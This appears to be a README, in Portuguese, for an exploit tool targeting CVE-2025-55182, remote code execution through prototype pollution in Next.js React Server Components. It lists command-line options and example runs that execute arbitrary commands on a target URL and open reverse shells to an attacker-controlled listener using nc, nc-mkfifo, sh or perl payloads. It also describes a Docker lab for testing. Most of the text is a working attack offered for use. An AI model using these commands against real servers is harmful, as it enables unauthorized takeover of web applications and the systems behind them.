
Exploit para CVE-2025-55182 que permite execução remota de código via poluição de protótipo em Next.js React Server Components, com capacidades de execução de comandos e shell reversa.
Explora a CVE-2025-55182 para execução remota de código via poluição de protótipo.
uv sync
source .venv/bin/activate
python3 exploit.py -u https://example.com -c "id"
python3 exploit.py -u https://example.com -r -l YOUR_IP -p 4444 -P nc-mkfifo
-u, --url: URL/host para verificar (obrigatório)-c, --cmd: Comando a executar-r, --reverse: Ativa o modo de shell reverso-l, --lhost: Host do listener para o shell reverso-p, --lport: Porta do listener para o shell reverso-P, --payload: Tipo de payload do shell reverso: nc, nc-mkfifo, sh, perl (padrão: nc)--timeout: Tempo limite de requisição em segundos (padrão: 10)# Execute command
python3 exploit.py -u https://example.com -c "whoami"
# Reverse shell with nc-mkfifo (recommended for Alpine)
python3 exploit.py -u https://example.com -r -l 172.29.0.1 -p 4444 -P nc-mkfifo
O diretório lab/ contém uma configuração Docker completa para testar o exploit.
cd lab
docker-compose up -d
Isso iniciará dois serviços:
# Test on vulnerable instance
python3 exploit.py -u http://localhost:3011 -c "id"
# Test reverse shell (get gateway IP first)
GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')
python3 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo